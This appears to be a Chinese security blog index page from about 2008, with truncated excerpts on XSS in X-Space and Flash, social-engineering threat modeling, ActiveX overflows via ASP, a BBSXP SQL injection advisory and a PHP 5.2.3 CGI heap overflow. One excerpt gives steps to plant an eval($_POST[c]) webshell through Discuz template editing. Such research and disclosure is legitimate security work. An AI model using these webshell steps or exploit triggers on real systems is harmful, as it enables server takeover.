鬼仔's Blog

作者：ycosxhack
来源：余弦函数

昨天将闪吧新社区的博客系统XSS了，它使用X-Space这个开源的PHP+MySQL程序，最新版的X-Space仍然存在严重的XSS漏洞。这个渗透过程没任何难度：http://space.flash8.net/space/?716894。用户可以在自定义CSS时无任何限制地构造任意js代码。由于X-Space经常与Discuz!整合使用（Blog+BBS模式），所以一旦跨站成功，将有可能会威胁到整个系统。
阅读全文 »

作者：ycosxhack
来源：余弦函数

XSS即Cross-Site Scripting跨站脚本，提到XSS，我们首先会想到作为web客户端逻辑控制的脚本语言JavaScript，不过我认为XSS不应该就是 JavaScript的专利。随着Flash与Flex的壮大，随着RIA应用的普及，ActionScript脚本语言带来了全新的XSS威胁！这样的威胁可以分为两类：
1）、AS的inline-XSS即内嵌跨站脚本，这类跨站发生在flash运行环境内。
2）、ASJS通信盒子，这最终还是要借助JavaScript。AS3对安全性能要求苛刻，相比JavaScript，AS是神秘的、新鲜的。
其实ActionScript与VBScript、服务端编程一样都可以作为跨站攻击的一种辅助手段。不过随着Flex在RIA应用中的猛烈发展， 阅读全文 »

作者：刺
来源：幻影maillist

其实社工FUZZ也是可能的

而且我想我的方法还是比较科学和可行的

按照安全开发流程(SDL)里的方法，在一个环节中是要建立威胁模型(Threat Modeling)

其基本思路是找出所有系统的边界

然后根据边界(Border)和数据流向(Data Flow)分析攻击范围（Attack Surface）

这样就有一个比较清晰的思路；

在社工FUZZ中，可以分析目标的所有对外的边界（比如HR、销售、公司高管、技术人员、客服、财务 各人员节点对外业务）

然后建立这些人员节点之间的数据联系，以及可能的业务；（比如HR可能会找猎头公司买资料，可能会参加校园招聘，可能会有机会接触到其电脑）

根据业务逻辑，可以确定出 Attack Surface(比如攻击HR的途径、 攻击客服的途径)；
阅读全文 »

Team: http://www.ph4nt0m.org
Author: 云舒（http://www.icylife.net）
Date: 2008-02-19

做windows系统渗透测试的时候有webshell了，但是拿不到shell，用来提升权限，也是个很郁闷的事情。一般来说，使用mdb jet引擎的溢出比较常见，但是有时候根据服务器上安装的第三方软件，使用一些新的方法，或许能有一点转机。这里主要描述一下调用activex溢出服务器的思路，方法很简单。

activex溢出一般都是用来攻击客户端的，但是这里，主要就是利用了asp是在服务端执行的，而且可以调用activex控件的原理。废话不多说了，一小段测试性质的代码，在服务器上放这么个asp文 阅读全文 »

By:Neeao[B.C.T]

漏洞预警中心小组应急事件响应公告

测试系统：
BBSXP2008 ACCESS版本 目前为最新版

安全综述：
BBSXP为一款简单的ASP+SQL与ACCESS开发的多风格论坛 目前最新版本为BBSXP2008
漏洞描述：
Manage.asp文件的ThreadID没有经过任何过滤便放入SQL语句中执行 导致注射漏洞发生

漏洞代码:
<%
if CookieUserName=empty then error("您还未<a href=""javascript:BBSXP_Modal.Open('Login.asp',380,170);"">登录</a>论坛")

if Request_Method <> "POST" then error("<li>提交方式错误！</li><li>您本次使用的是"& Request_Method&"提交方式！</li>")
阅读全文 »

yuange http://hi.baidu.com/yuange1975

影响版本： php5.2.3
不影响版本： 其它版本

php5.2.3在处理CGI的时候，由于一编程错误（缺少括号），错误计算一字符串长度，导致堆缓冲溢出，可能远程执行任意代码。
触发方式:配置.php到php.exe的CGI映射，请求GET /test.php/aa HTTP/1.1

错误发生在php-5.2.3\sapi\cgi\cgi-man.c line 886:

int path_translated_len = ptlen + env_path_info ? strlen(env_path_info) : 0;

程序应该是

int path_translated_len = 阅读全文 »

文章作者：Ryat （lib3r3t）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：文章首发狼族（www.wolvez.org），后由原创作者有请提交到邪恶八进制，转载请注明原始作者和出处。

如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：）

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php 107行：
阅读全文 »

作者：ycosxhack
来源：余弦函数

Flash与时下流行的Flex（Adobe给出的RIA解决方案，我才开始接触:-(）使用的编程语言皆为ActionScript。而JavaScript主要被用于web客户端进行数据的逻辑控制。这两个脚本语言之间的通信模型我称之为ASJS通信盒子。
研究这个，我的目的是给XSS增加点新鲜血液，其中会涉及到XML XSS（本文无）。这次的研究对象为百度空间相册，在空间首页中显示的相册功能模块。虽然有好几次的心跳，但还是没XSS成功~~~不过这次分析还是有收获的。比如：我开始写这篇文章了^^
http://www.xsscos.com/test.php?xss=hello-world这样格式的url不陌生吧？ 阅读全文 »